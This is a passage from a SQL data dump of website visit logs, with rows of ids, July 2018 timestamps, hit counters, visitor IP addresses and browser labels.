98,1,1,0,0,'54.36.148.113','other'),(266657,1530590384,1,1,0,0,'216.244.66.241','other'),(266658,1530590404,1,1,0,0,'54.36.148.124','other'),(266659,1530590431,1,1,0,0,'54.36.149.35','other'),(266660,1530590467,4,4,0,0,'95.163.255.107','other'),(266661,1530590473,1,1,0,0,'54.36.149.1','other'),(266662,1530590474,1,1,0,0,'95.163.255.106','other'),(266663,1530590482,2,2,0,0,'95.163.255.103','other'),(266664,1530590497,1,1,0,0,'95.163.255.119','other'),(266665,1530590504,2,2,0,0,'95.163.255.116','other'),(266666,1530590512,1,1,0,0,'95.163.255.102','other'),(266667,1530590518,1,1,0,0,'54.36.149.78','other'),(266668,1530590596,1,1,0,0,'95.158.42.208','other'),(266669,1530590788,1,1,0,0,'54.36.148.188','other'),(266670,1530590823,1,1,0,0,'54.36.148.211','other'),(266671,1530590911,1,1,0,0,'54.36.148.121','other'),(266672,1530591127,1,1,0,0,'5.105.215.25','other'),(266673,1530591266,1,1,0,0,'69.171.225.135','other'),(266674,1530591283,1,1,0,0,'176.110.27.220','chrome'),(266675,1530591327,1,1,0,0,'216.244.66.241','other'),(266676,1530591416,1,1,0,0,'87.250.224.46','other'),(266677,1530591588,1,1,0,0,'178.151.5.111','other'),(266678,1530591709,1,1,0,0,'136.243.77.106','other'),(266679,1530591717,1,1,0,0,'178.154.171.88','other'),(266680,1530591824,1,1,0,0,'157.55.39.102','other'),(266681,1530591836,1,1,0,0,'54.36.148.249','other'),(266682,1530591855,1,1,0,0,'54.36.148.130','other'),(266683,1530591906,1,1,0,0,'54.36.149.102','other'),(266684,1530591966,1,1,0,0,'54.36.148.58','other'),(266685,1530591975,1,1,0,0,'54.36.149.49','other'),(266686,1530592027,1,1,0,0,'173.252.88.16','other'),(266687,1530592098,1,1,0,0,'95.163.255.182','other'),(266688,1530592299,1,1,0,0,'54.36.148.135','other'),(266689,1530592476,2,2,0,0,'141.8.142.74','other'),(266690,1530592822,1,1,0,0,'157.55.39.102','other'),(266691,1530592935,1,1,0,0,'188.230.43.254','other'),(266692,1530593033,1,1,0,0,'54.36.148.200','other'),(266693,1530593067,1,1,0,0,'54.36.149.42','other'),(266694,1530593182,1,1,0,0,'54.36.149.27','other'),(266695,1530593203,1,1,0,0,'69.171.225.90','other'),(266696,1530593316,1,1,0,0,'54.36.149.46','other'),(266697,1530593433,1,1,0,0,'54.36.149.7','other'),(266698,1530593442,1,1,0,0,'46.211.127.141','other'),(266699,1530593507,2,2,0,0,'35.239.135.210','other'),(266700,1530593524,1,1,0,0,'54.36.148.157','other'),(266701,1530593548,1,1,0,0,'173.252.84.205','other'),(266702,1530593773,1,1,0,0,'141.8.142.74','other'),(266703,1530593929,1,1,0,0,'54.36.149.39','other'),(266704,1530594058,5,5,0,0,'216.244.66.241','other'),(266705,1530594144,1,1,0,0,'54.36.148.207','other'),(266706,1530594154,1,1,0,0,'54.36.149.10','other'),(266707,1530594156,1,1,0,0,'54.36.148.34','other'),(266708,1530594797,1,1,0,0,'157.55.39.97','other'),(266709,1530595023,1,1,0,0,'54.36.148.59','other'),(266710,1530595140,1,1,0,0,'54.36.148.145','other'),(266711,1530595191,1,1,0,0,'54.36.148.189','other'),(266712,1530595192,1,1,0,0,'91.124.182.170','firefox'),(266713,1530595247,1,1,0,0,'54.36.148.213','other'),(266714,1530595332,1,1,0,0,'188.230.43.254','other'),(266715,1530595521,1,1,0,0,'54.36.149.27','other'),(266716,1530595627,1,1,0,0,'54.36.148.116','other'),(266717,1530595639,1,1,0,0,'216.244.66.241','other'),(266718,1530595713,1,1,0,0,'54.36.148.252','other'),(266719,1530595752,1,1,0,0,'54.36.148.237','other'),(266720,1530595760,1,1,0,0,'8.29.198.25','other'),(266721,1530595882,1,1,0,0,'95.163.255.222','other'),(266722,1530596133,2,2,0,0,'157.55.39.102','other'),(266723,1530596143,1,1,0,0,'91.196.178.75','chrome'),(266724,1530596203,1,1,0,0,'91.124.182.170','firefox'),(266725,1530596210,2,2,0,0,'178.154.171.88','other'),(266726,1530596228,1,1,0,0,'37.73.136.63','chrome'),(266727,1530596262,1,1,0,0,'54.36.149.69','other'),(266728,1530596287,1,1,0,0,'54.36.148.126','other'),(266729,1530596289,1,1,0,0,'54.36.148.196','other'),(266730,1530596347,2,2,0,0,'141.8.142.74','other'),(266731,1530596459,1,1,0,0,'54.36.148.205','other'),(266732,1530596787,3,3,0,0,'216.244.66.241','other'),(266733,1530596906,1,1,0,0,'54.36.149.75','other'),(266734,1530597046,1,1,0,0,'54.36.149.20','other'),(266735,1530597081,1,1,0,0,'173.252.85.220','other'),(266736,1530597106,1,1,0,0,'54.36.148.189','other'),(266737,1530597201,1,1,0,0,'54.36.148.198','other'),(266738,1530597233,1,1,0,0,'176.97.3.151','other'),(266739,1530597340,1,1,0,0,'54.36.148.131','other'),(266740,1530597401,1,1,0,0,'94.23.3.136','firefox'),(266741,1530597440,1,1,0,0,'141.8.142.74','other'),(266742,1530597592,1,1,0,0,'54.36.148.106','other'),(266743,1530597598,1,1,0,0,'69.171.225.146','other'),(266744,1530597707,1,1,0,0,'188.230.43.254','other'),(266745,1530598197,1,1,0,0,'95.163.255.187','other'),(266746,1530598242,1,1,0,0,'91.196.177.46','chrome'),(266747,1530598308,141,141,0,0,'148.251.244.137','other'),(266748,1530598385,3,3,0,0,'216.244.66.241','other'),(266749,1530598411,1,1,0,0,'54.36.149.107','other'),(266750,1530598592,1,1,0,0,'54.36.148.160','other'),(266751,1530598657,1,1,0,0,'157.55.39.97','other'),(266752,1530598664,1,1,0,0,'54.36.149.21','other'),(266753,1530598927,1,1,0,0,'37.9.113.182','other'),(266754,1530598981,1,1,0,0,'54.36.148.44','other'),(266755,1530598996,1,1,0,0,'54.36.148.48','other'),(266756,1530599033,1,1,0,0,'54.36.148.199','other'),(266757,1530599187,1,1,0,0,'54.36.148.87','other'),(266758,1530599421,2,2,0,0,'216.244.66.241','other'),(266759,1530599481,1,1,0,0,'54.36.148.116','other'),(266760,1530599528,1,1,0,0,'159.224.216.96','other'),(266761,1530599650,1,1,0,0,'46.201.112.12','chrome'),(266762,1530599687,1,1,0,0,'195.244.8.101','firefox'),(266763,1530599852,2,2,0,0,'130.180.220.245','chrome'),(266764,1530599983,1,1,0,0,'54.36.148.127','other'),(266765,1530600013,1,1,0,0,'8.29.198.26','other'),(266766,1530600133,1,1,0,0,'188.230.43.254','other'),(266767,1530600164,1,1,0,0,'54.36.149.30','other'),(266768,1530600245,2,2,0,0,'141.8.142.74','other'),(266769,1530600254,1,1,0,0,'178.93.119.177','chrome'),(266770,1530600365,1,1,0,0,'54.36.148.140','other'),(266771,1530600381,1,1,0,0,'95.163.255.92','other'),(266772,1530600425,1,1,0,0,'54.36.148.179','other'),(266773,1530600513,2,2,0,0,'195.230.119.59','chrome'),(266774,1530600690,1,1,0,0,'54.36.148.143','other'),(266775,1530600833,1,1,0,0,'54.36.148.226','other'),(266776,1530600853,1,1,0,0,'54.36.148.29','other'),(266777,1530601099,1,1,0,0,'91.195.244.237','chrome'),(266778,1530601157,1,1,0,0,'54.36.149.7','other'),(266779,1530601339,1,1,0,0,'54.36.148.30','other'),(266780,1530601540,1,1,0,0,'216.244.66.241','other'),(266781,1530601576,1,1,0,0,'54.36.148.197','other'),(266782,1530601650,1,1,0,0,'54.36.148.62','other'),(266783,1530601674,1,1,0,0,'54.36.149.81','other'),(266784,1530601836,1,1,0,0,'54.36.148.156','other'),(266785,1530601957,1,1,0,0,'54.36.149.52','other'),(266786,1530602152,1,1,0,0,'54.36.148.141','other'),(266787,1530602190,1,1,0,0,'54.36.149.74','other'),(266788,1530602301,1,1,0,0,'54.36.149.59','other'),(266789,1530602302,1,1,0,0,'54.36.148.58','other'),(266790,1530602394,1,1,0,0,'54.36.148.120','other'),(266791,1530602515,1,1,0,0,'188.230.43.254','other'),(266792,1530602642,1,1,0,0,'91.233.90.33','other'),(266793,1530602707,1,1,0,0,'54.36.148.70','other'),(266794,1530602746,1,1,0,0,'54.36.148.122','other'),(266795,1530602777,1,1,0,0,'54.36.149.4','other'),(266796,1530602802,1,1,0,0,'54.36.148.242','other'),(266797,1530602813,1,1,0,0,'54.36.148.136','other'),(266798,1530602882,1,1,0,0,'54.36.148.55','other'),(266799,1530603122,1,1,0,0,'54.36.148.95','other'),(266800,1530603747,1,1,0,0,'178.154.171.88','other'),(266801,1530603807,1,1,0,0,'54.36.148.87','other'),(266802,1530603870,1,1,0,0,'54.36.148.77','other'),(266803,1530603998,1,1,0,0,'54.36.148.232','other'),(266804,1530604030,5,5,0,0,'216.244.66.241','other'),(266805,1530604195,1,1,0,0,'141.8.142.74','other'),(266806,1530604420,1,1,0,0,'95.132.21.141','opera'),(266807,1530604454,1,1,0,0,'54.36.148.76','other'),(266808,1530604608,1,1,0,0,'176.102.223.1','chrome'),(266809,1530604751,2,2,0,0,'178.154.171.88','other'),(266810,1530604844,1,1,0,0,'54.36.148.239','other'),(266811,1530604853,1,1,0,0,'54.36.149.102','other'),(266812,1530604869,1,1,0,0,'54.36.148.177','other'),(266813,1530604963,1,1,0,0,'91.196.179.33','chrome'),(266814,1530605129,1,1,0,0,'141.8.142.74','other'),(266815,1530605204,1,1,0,0,'54.36.148.113','other'),(266816,1530605271,1,1,0,0,'54.36.148.181','other'),(266817,1530605441,1,1,0,0,'54.36.148.150','other'),(266818,1530605491,1,1,0,0,'54.36.148.123','other'),(266819,1530605567,2,2,0,0,'146.185.157.230','chrome'),(266820,1530605783,1,1,0,0,'54.36.148.76','other'),(266821,1530606207,1,1,0,0,'54.36.148.246','other'),(266822,1530606292,1,1,0,0,'95.163.255.205','other'),(266823,1530606322,1,1,0,0,'54.36.148.149','other'),(266824,1530606459,1,1,0,0,'54.36.148.141','other'),(266825,1530606589,1,1,0,0,'8.29.198.26','other'),(266826,1530606604,1,1,0,0,'95.163.255.92','other'),(266827,1530606828,2,2,0,0,'146.185.157.230','chrome'),(266828,1530606861,2,2,0,0,'91.196.178.171','chrome'),(266829,1530606884,1,1,0,0,'54.36.148.185','other'),(266830,1530607076,1,1,0,0,'54.36.148.99','other'),(266831,1530607338,1,1,0,0,'95.163.255.201','other'),(266832,1530607422,1,1,0,0,'178.154.171.88','other'),(266833,1530607644,1,1,0,0,'54.36.148.197','other'),(266834,1530607810,3,3,0,0,'141.8.142.74','other'),(266835,1530607825,1,1,0,0,'54.36.148.153','other'),(266836,1530607943,1,1,0,0,'54.36.148.75','other'),(266837,1530607975,1,1,0,0,'95.135.191.150','chrome'),(266838,1530608164,1,1,0,0,'54.36.149.57','other'),(266839,1530608223,1,1,0,0,'54.36.149.28','other'),(266840,1530608350,1,1,0,0,'54.36.148.124','other'),(266841,1530608464,1,1,0,0,'95.163.255.222','other'),(266842,1530608546,1,1,0,0,'178.154.171.88','other'),(266843,1530608560,1,1,0,0,'91.196.178.66','firefox'),(266844,1530608805,1,1,0,0,'199.59.150.181','other'),(266845,1530608862,2,2,0,0,'54.36.149.78','other'),(266846,1530608924,1,1,0,0,'54.36.148.103','other'),(266847,1530609072,3,3,0,0,'130.180.220.245','chrome'),(266848,1530609146,2,2,0,0,'91.196.178.85','chrome'),(266849,1530609186,1,1,0,0,'93.171.243.15','chrome'),(266850,1530609204,1,1,0,0,'95.163.255.160','other'),(266851,1530609239,1,1,0,0,'54.36.149.34','other'),(266852,1530609355,2,2,0,0,'216.244.66.241','other'),(266853,1530609647,1,1,0,0,'54.36.148.157','other'),(266854,1530609695,1,1,0,0,'54.36.148.194','other'),(266855,1530609700,1,1,0,0,'54.36.148.238','other'),(266856,1530609827,1,1,0,0,'54.36.148.201','other'),(266857,1530610143,1,1,0,0,'176.195.66.65','msie'),(266858,1530610166,1,1,0,0,'54.36.149.96','other'),(266859,1530610167,1,1,0,0,'178.154.171.88','other'),(266860,1530610227,1,1,0,0,'54.36.149.20','other'),(266861,1530610255,1,1,0,0,'54.36.148.220','other'),(266862,1530610366,1,1,0,0,'54.36.148.90','other'),(266863,1530610383,1,1,0,0,'54.36.149.27','other'),(266864,1530610426,1,1,0,0,'54.36.148.120','other'),(266865,1530610451,1,1,0,0,'178.251.109.241','chrome'),(266866,1530610512,1,1,0,0,'54.36.148.247','other'),(266867,1530610662,2,2,0,0,'91.196.178.171','chrome'),(266868,1530610717,2,2,0,0,'91.196.178.66','firefox'),(266869,1530610867,1,1,0,0,'8.29.198.25','other'),(266870,1530610905,1,1,0,0,'54.36.149.51','other'),(266871,1530611060,1,1,0,0,'54.36.149.102','other'),(266872,1530611085,1,1,0,0,'54.36.148.191','other'),(266873,1530611393,1,1,0,0,'54.36.148.233','other'),(266874,1530611591,1,1,0,0,'54.36.149.99','other'),(266875,1530611594,4,4,0,0,'216.244.66.241','other'),(266876,1530611725,1,1,0,0,'141.8.142.74','other'),(266877,1530611741,1,1,0,0,'54.36.148.51','other'),(266878,1530611822,1,1,0,0,'46.211.132.10','other'),(266879,1530611823,1,1,0,0,'54.36.148.25','other'),(266880,1530612166,2,2,0,0,'91.196.178.169','chrome'),(266881,1530612277,1,1,0,0,'54.36.149.28','other'),(266882,1530612508,1,1,0,0,'54.36.148.236','other'),(266883,1530612594,1,1,0,0,'54.36.149.46','other'),(266884,1530612608,1,1,0,0,'91.196.178.75','chrome'),(266885,1530612676,1,1,0,0,'178.154.200.41','other'),(266886,1530612741,1,1,0,0,'216.244.66.241','other'),(266887,1530612779,1,1,0,0,'54.36.148.219','other'),(266888,1530612826,1,1,0,0,'109.207.193.98','chrome'),(266889,1530613024,1,1,0,0,'5.58.70.135','other'),(266890,1530613092,1,1,0,0,'54.36.148.133','other'),(266891,1530613319,1,1,0,0,'37.55.78.241','chrome'),(266892,1530613396,1,1,0,0,'173.252.92.69','other'),(266893,1530613471,1,1,0,0,'54.36.148.74','other'),(266894,1530613490,1,1,0,0,'54.36.149.33','other'),(266895,1530613594,2,2,0,0,'178.154.171.88','other'),(266896,1530613674,1,1,0,0,'178.92.244.43','chrome'),(266897,1530613752,2,2,0,0,'130.180.220.245','chrome'),(266898,1530613861,1,1,0,0,'54.36.148.39','other'),(266899,1530613887,1,1,0,0,'54.36.148.220','other'),(266900,1530614055,1,1,0,0,'54.36.148.126','other'),(266901,1530614349,3,3,0,0,'216.244.66.241','other'),(266902,1530614557,1,1,0,0,'54.36.149.59','other'),(266903,1530614579,1,1,0,0,'54.36.148.133','other'),(266904,1530614686,1,1,0,0,'54.36.149.20','other'),(266905,1530614695,1,1,0,0,'188.163.5.3','other'),(266906,1530614774,1,1,0,0,'54.36.148.158','other'),(266907,1530614839,1,1,0,0,'54.36.148.83','other'),(266908,1530614905,1,1,0,0,'54.36.148.75','other'),(266909,1530615170,1,1,0,0,'54.36.148.221','other'),(266910,1530615264,1,1,0,0,'54.36.148.113','other'),(266911,1530615316,1,1,0,0,'178.251.109.240','chrome'),(266912,1530615324,2,2,0,0,'216.244.66.241','other'),(266913,1530615345,1,1,0,0,'157.55.39.102','other'),(266914,1530615410,1,1,0,0,'141.8.142.74','other'),(266915,1530615514,2,2,0,0,'54.36.148.175','other'),(266916,1530615602,1,1,0,0,'178.154.171.88','other'),(266917,1530615660,1,1,0,0,'54.36.148.122','other'),(266918,1530615730,1,1,0,0,'37.73.43.189','chrome'),(266919,1530616196,1,1,0,0,'54.36.148.93','other'),(266920,1530616226,1,1,0,0,'46.211.128.80','chrome'),(266921,1530616332,1,1,0,0,'91.196.177.85','chrome'),(266922,1530616410,1,1,0,0,'54.36.149.20','other'),(266923,1530616648,1,1,0,0,'54.36.149.87','other'),(266924,1530616678,1,1,0,0,'54.36.148.85','other'),(266925,1530616693,1,1,0,0,'54.36.148.31','other'),(266926,1530616780,1,1,0,0,'185.11.31.200','other'),(266927,1530616811,1,1,0,0,'54.36.149.29','other'),(266928,1530616885,2,2,0,0,'162.210.196.97','other'),(266929,1530616931,1,1,0,0,'54.36.148.91','other'),(266930,1530616944,4,4,0,0,'216.244.66.241','other'),(266931,1530617088,1,1,0,0,'54.36.148.97','other'),(266932,1530617150,1,1,0,0,'54.36.148.115','other'),(266933,1530617181,1,1,0,0,'54.36.149.93','other'),(266935,1530617439,1,1,0,0,'8.29.198.27','other'),(266936,1530617629,1,1,0,0,'54.36.148.199','other'),(266937,1530617897,1,1,0,0,'54.36.148.202','other'),(266938,1530618116,1,1,0,0,'54.36.148.24','other'),(266939,1530618218,1,1,0,0,'54.36.148.220','other'),(266940,1530618302,2,2,0,0,'66.102.9.38','chrome'),(266941,1530618483,1,0,1,0,'66.249.69.156',''),(266942,1530618538,1,1,0,0,'46.211.128.80','chrome'),(266943,1530618783,1,1,0,0,'54.36.148.22','other'),(266944,1530619003,2,2,0,0,'141.8.142.74','other'),(266945,1530619201,1,1,0,0,'178.154.171.88','other'),(266946,1530619244,1,1,0,0,'91.196.178.97','chrome'),(266947,1530619463,1,1,0,0,'54.36.148.75','other'),(266948,1530619468,1,1,0,0,'54.36.148.156','other'),(266949,1530619618,1,1,0,0,'54.36.148.72','other'),(266950,1530619645,1,1,0,0,'54.36.148.87','other'),(266951,1530619685,1,1,0,0,'54.36.148.227','other'),(266952,1530619826,1,0,1,0,'66.249.69.156',''),(266953,1530619949,2,2,0,0,'216.244.66.241','other'),(266954,1530620033,1,1,0,0,'157.55.39.102','other'),(266955,1530620076,1,1,0,0,'54.36.148.64','other'),(266956,1530620096,1,1,0,0,'54.36.149.0','other'),(266957,1530620273,1,1,0,0,'54.36.148.67','other'),(266958,1530620278,1,1,0,0,'54.36.148.65','other'),(266959,1530620366,1,1,0,0,'54.36.148.136','other'),(266960,1530620426,1,1,0,0,'54.36.148.144','other'),(266961,1530620436,1,1,0,0,'54.36.149.35','other'),(266962,1530620441,1,1,0,0,'173.252.95.21','other'),(266963,1530620546,1,1,0,0,'54.36.149.7','other'),(266964,1530620611,18,18,0,0,'95.91.12.125','other'),(266965,1530620764,4,4,0,0,'176.113.209.232','chrome'),(266966,1530620839,1,1,0,0,'54.36.149.81','other'),(266967,1530620921,1,1,0,0,'54.36.149.18','other'),(266968,1530621005,1,1,0,0,'54.36.149.46','other'),(266969,1530621110,1,1,0,0,'54.36.148.133','other'),(266970,1530621255,1,1,0,0,'87.250.224.46','other'),(266971,1530621449,1,1,0,0,'54.36.149.61','other'),(266972,1530621534,2,2,0,0,'91.201.188.163','chrome'),(266973,1530621634,1,1,0,0,'176.122.109.73','chrome'),(266974,1530621737,1,1,0,0,'8.29.198.27','other'),(266975,1530621811,1,1,0,0,'176.113.209.232','chrome'),(266976,1530621847,1,1,0,0,'54.36.148.95','other'),(266977,1530622118,1,1,0,0,'54.36.148.35','other'),(266978,1530622151,1,1,0,0,'54.36.148.11','other'),(266979,1530622344,1,1,0,0,'54.36.148.255','other'),(266980,1530622452,1,1,0,0,'178.92.244.216','chrome'),(266981,1530622586,1,1,0,0,'54.36.148.134','other'),(266982,1530622686,1,1,0,0,'54.36.149.50','other'),(266983,1530622820,1,1,0,0,'54.36.148.114','other'),(266984,1530622859,1,1,0,0,'141.8.142.74','other'),(266985,1530622860,1,1,0,0,'54.165.59.7','other'),(266986,1530622867,1,1,0,0,'54.36.148.150','other'),(266987,1530622967,1,1,0,0,'54.36.149.7','other'),(266988,1530623011,1,1,0,0,'54.36.148.25','other'),(266989,1530623120,1,1,0,0,'54.36.148.107','other'),(266990,1530623195,1,1,0,0,'54.36.148.86','other'),(266991,1530623201,1,1,0,0,'91.196.178.75','chrome'),(266992,1530623505,1,1,0,0,'94.231.188.10','chrome'),(266993,1530623583,1,1,0,0,'178.154.171.88','other'),(266994,1530623639,2,2,0,0,'91.201.188.163','chrome'),(266995,1530623776,1,1,0,0,'54.36.148.87','other'),(266996,1530623794,1,1,0,0,'54.36.149.38','other'),(266997,1530623795,1,1,0,0,'54.36.148.213','other'),(266998,1530623820,1,1,0,0,'54.36.148.13','other'),(266999,1530623880,1,1,0,0,'54.36.148.37','other'),(267000,1530623919,1,1,0,0,'91.196.178.103','chrome'),(267001,1530623987,1,1,0,0,'80.91.185.106','chrome'),(267002,1530624043,1,1,0,0,'54.36.149.54','other'),(267003,1530624195,1,1,0,0,'54.36.149.75','other'),(267004,1530624254,1,1,0,0,'54.36.148.232','other'),(267005,1530624330,1,1,0,0,'54.36.148.252','other'),(267006,1530624428,1,1,0,0,'54.36.149.29','other'),(267007,1530624551,1,1,0,0,'54.36.148.198','other'),(267008,1530624585,1,1,0,0,'54.36.148.116','other'),(267009,1530624711,4,4,0,0,'216.244.66.241','other'),(267010,1530624825,1,1,0,0,'54.165.59.7','other'),(267011,1530624842,1,1,0,0,'95.135.29.32','chrome'),(267012,1530624849,1,1,0,0,'95.133.151.142','chrome'),(267013,1530624957,2,2,0,0,'54.36.148.211','other'),(267014,1530624958,1,1,0,0,'54.36.148.178','other'),(267015,1530625263,1,1,0,0,'91.196.178.75','chrome'),(267016,1530625284,1,1,0,0,'54.36.149.33','other'),(267017,1530625427,1,1,0,0,'54.36.148.52','other'),(267018,1530625635,1,1,0,0,'94.23.200.86','other'),(267019,1530625827,1,1,0,0,'54.36.149.40','other'),(267020,1530625920,1,1,0,0,'54.36.148.31','other'),(267021,1530626105,1,1,0,0,'54.36.148.239','other'),(267022,1530626154,1,1,0,0,'141.8.142.74','other'),(267023,1530626236,1,1,0,0,'54.36.148.58','other'),(267024,1530626999,2,2,0,0,'91.196.178.75','chrome'),(267025,1530627050,1,1,0,0,'178.154.171.88','other'),(267026,1530627630,6,6,0,0,'216.244.66.241','other'),(267027,1530627696,1,1,0,0,'78.154.179.30','chrome'),(267028,1530628021,1,1,0,0,'107.167.108.75','chrome'),(267029,1530628288,1,1,0,0,'8.29.198.27','other'),(267030,1530628532,2,2,0,0,'216.244.66.241','other'),(267031,1530629806,1,1,0,0,'54.208.102.37','other'),(267032,1530629808,1,1,0,0,'107.21.1.8','other'),(267033,1530629850,1,1,0,0,'178.154.171.88','other'),(267034,1530630290,4,4,0,0,'91.121.109.55','other'),(267035,1530630350,1,1,0,0,'78.154.179.30','chrome'),(267036,1530630498,4,4,0,0,'216.244.66.241','other'),(267037,1530631225,1,1,0,0,'188.230.43.254','other'),(267038,1530631234,2,2,0,0,'95.216.20.16','other'),(267039,1530631625,2,0,2,0,'66.249.69.201',''),(267040,1530631640,1,1,0,0,'141.8.142.74','other'),(267041,1530632471,1,1,0,0,'91.196.178.103','chrome'),(267042,1530632599,1,1,0,0,'8.29.198.26','other'),(267043,1530632701,1,0,1,0,'66.249.69.195',''),(267044,1530632801,2,2,0,0,'216.244.66.241','other'),(267045,1530633128,1,0,1,0,'66.249.69.199',''),(267046,1530633622,1,1,0,0,'188.230.43.254','other'),(267047,1530633698,1,1,0,0,'141.8.142.74','other'),(267048,1530633853,1,0,1,0,'66.249.69.158',''),(267049,1530634217,1,1,0,0,'178.154.200.41','other'),(267050,1530634245,1,1,0,0,'66.249.69.199','chrome'),(267051,1530635583,1,1,0,0,'216.244.66.241','other'),(267052,1530635742,1,0,1,0,'66.249.69.158',''),(267053,1530635915,1,1,0,0,'91.196.178.89','firefox'),(267054,1530636020,1,0,1,0,'66.249.69.156',''),(267055,1530636030,1,1,0,0,'188.230.43.254','other'),(267056,1530636434,2,2,0,0,'178.154.171.88','other'),(267057,1530636785,1,1,0,0,'91.196.178.185','chrome'),(267058,1530636963,2,2,0,0,'91.196.178.41','chrome'),(267059,1530637236,1,1,0,0,'163.172.255.139','chrome'),(267060,1530638138,2,2,0,0,'141.8.142.74','other'),(267061,1530638153,1,1,0,0,'178.154.171.88','other'),(267062,1530638440,1,1,0,0,'188.230.43.254','other'),(267063,1530638788,1,0,1,0,'66.249.69.156',''),(267064,1530638843,1,1,0,0,'130.180.210.217','other'),(267065,1530639126,1,1,0,0,'8.29.198.25','other'),(267066,1530639598,3,3,0,0,'62.205.150.65','chrome'),(267067,1530639861,1,1,0,0,'91.196.178.129','chrome'),(267068,1530640017,1,1,0,0,'216.244.66.241','other'),(267069,1530640040,1,1,0,0,'95.158.36.190','other'),(267070,1530640079,2,2,0,0,'91.196.178.178','chrome'),(267071,1530640496,1,1,0,0,'91.209.11.236','other'),(267072,1530640552,1,1,0,0,'66.249.69.201','chrome'),(267073,1530640826,1,1,0,0,'188.230.43.254','other'),(267074,1530641040,2,2,0,0,'178.154.171.88','other'),(267075,1530641071,1,0,1,0,'66.249.69.195',''),(267076,1530641086,1,1,0,0,'141.8.142.74','other'),(267077,1530641665,1,1,0,0,'216.244.66.241','other'),(267078,1530641755,1,1,0,0,'66.249.69.199','chrome'),(267079,1530642116,1,0,1,0,'66.249.69.156',''),(267080,1530642455,1,1,0,0,'157.55.39.100','other'),(267081,1530642463,2,2,0,0,'141.8.142.74','other'),(267082,1530642484,1,1,0,0,'54.165.59.7','other'),(267083,1530642760,1,1,0,0,'178.154.171.88','other'),(267084,1530642974,1,1,0,0,'66.249.69.156','chrome'),(267085,1530643007,1,0,1,0,'66.249.69.157',''),(267086,1530643342,6,6,0,0,'216.244.66.241','other'),(267087,1530643445,1,1,0,0,'8.29.198.26','other'),(267088,1530643579,3,3,0,0,'141.8.142.74','other'),(267089,1530643767,1,1,0,0,'91.196.178.132','chrome'),(267090,1530644068,3,3,0,0,'178.154.171.88','other'),(267091,1530644302,1,1,0,0,'216.244.66.241','other'),(267092,1530644526,1,1,0,0,'95.163.255.164','other'),(267093,1530644621,1,1,0,0,'95.163.255.163','other'),(267094,1530645515,1,1,0,0,'141.8.142.74','other'),(267095,1530645950,2,2,0,0,'87.250.224.46','other'),(267096,1530646134,3,3,0,0,'216.244.66.241','other'),(267097,1530646361,2,2,0,0,'92.113.189.235','chrome'),(267098,1530646708,1,1,0,0,'35.153.83.126','other'),(267099,1530647087,1,1,0,0,'130.180.208.238','other'),(267100,1530647148,1,0,1,0,'66.249.69.201',''),(267101,1530647675,1,1,0,0,'95.163.255.113','other'),(267102,1530647699,1,1,0,0,'95.163.255.118','other'),(267103,1530647734,1,1,0,0,'95.163.255.108','other'),(267104,1530647753,1,1,0,0,'157.55.39.102','other'),(267105,1530647829,1,1,0,0,'178.154.171.88','other'),(267106,1530648099,1,1,0,0,'35.153.83.126','other'),(267107,1530648106,2,2,0,0,'141.8.142.74','other'),(267108,1530648214,1,1,0,0,'66.249.69.199','chrome'),(267109,1530648290,2,2,0,0,'216.244.66.241','other'),(267110,1530648919,1,1,0,0,'91.121.83.160','chrome'),(267111,1530649457,2,2,0,0,'91.196.178.53','chrome'),(267112,1530649754,2,2,0,0,'141.8.142.74','other'),(267113,1530649891,1,1,0,0,'5.248.131.242','chrome'),(267114,1530649902,1,1,0,0,'95.163.255.92','other'),(267115,1530649955,1,1,0,0,'8.29.198.27','other'),(267116,1530650037,1,1,0,0,'35.153.83.126','other'),(267117,1530650280,1,1,0,0,'95.163.255.97','other'),(267118,1530650457,1,1,0,0,'95.163.255.93','other'),(267119,1530650559,1,1,0,0,'95.163.255.175','other'),(267120,1530650664,1,1,0,0,'91.196.178.36','chrome'),(267121,1530650724,1,1,0,0,'95.163.255.169','other'),(267122,1530651013,1,1,0,0,'35.153.83.126','other'),(267123,1530651482,4,4,0,0,'216.244.66.241','other'),(267124,1530651601,1,1,0,0,'178.154.171.88','other'),(267125,1530651655,2,2,0,0,'141.8.142.74','other'),(267126,1530652287,1,1,0,0,'35.153.83.126','other'),(267127,1530652588,1,1,0,0,'216.244.66.241','other'),(267128,1530653448,1,1,0,0,'141.8.142.74','other'),(267129,1530653599,1,1,0,0,'178.154.171.88','other'),(267130,1530653684,1,1,0,0,'35.153.83.126','other'),(267131,1530653928,2,2,0,0,'91.196.178.178','chrome'),(267132,1530654288,1,1,0,0,'8.29.198.25','other'),(267133,1530654562,1,0,1,0,'66.249.69.156',''),(267134,1530654920,1,1,0,0,'52.87.14.196','other'),(267135,1530654968,1,1,0,0,'193.142.219.177','chrome'),(267136,1530654981,1,1,0,0,'35.153.83.126','other'),(267137,1530655149,6,6,0,0,'141.8.142.74','other'),(267138,1530655188,1,1,0,0,'216.244.66.241','other'),(267139,1530655274,1,0,1,0,'66.249.69.157',''),(267140,1530655406,1,1,0,0,'178.154.171.88','other'),(267141,1530655601,1,1,0,0,'95.163.255.162','other'),(267142,1530655670,1,1,0,0,'95.163.255.190','other'),(267143,1530655677,1,1,0,0,'95.163.255.152','other'),(267144,1530656071,1,1,0,0,'52.87.14.196','other'),(267145,1530656369,1,1,0,0,'35.153.83.126','other'),(267146,1530656794,2,2,0,0,'141.8.142.74','other'),(267147,1530656930,6,6,0,0,'216.244.66.241','other'),(267148,1530657269,1,1,0,0,'87.250.224.46','other'),(267149,1530657577,1,1,0,0,'52.87.14.196','other'),(267150,1530657732,1,1,0,0,'95.163.255.103','other'),(267151,1530658123,1,1,0,0,'35.153.83.126','other'),(267152,1530658180,1,0,1,0,'66.249.69.158',''),(267153,1530658212,1,0,1,0,'66.249.69.201',''),(267154,1530658267,1,0,1,0,'66.249.69.157',''),(267155,1530658746,4,4,0,0,'178.154.171.88','other'),(267156,1530658875,1,1,0,0,'87.250.224.46','other'),(267157,1530658934,1,1,0,0,'52.87.14.196','other'),(267158,1530659182,2,2,0,0,'216.244.66.241','other'),(267159,1530660188,6,6,0,0,'216.244.66.241','other'),(267160,1530660192,1,1,0,0,'110.83.60.90','other'),(267161,1530660427,4,4,0,0,'141.8.142.74','other'),(267162,1530660616,1,1,0,0,'66.249.69.199','chrome'),(267163,1530660786,1,1,0,0,'8.29.198.26','other'),(267164,1530661117,1,1,0,0,'95.163.255.182','other'),(267165,1530661120,1,1,0,0,'95.163.255.180','other'),(267166,1530661198,1,1,0,0,'35.153.83.126','other'),(267167,1530661202,1,1,0,0,'52.87.14.196','other'),(267168,1530661370,1,1,0,0,'95.163.255.154','other'),(267169,1530661372,1,1,0,0,'9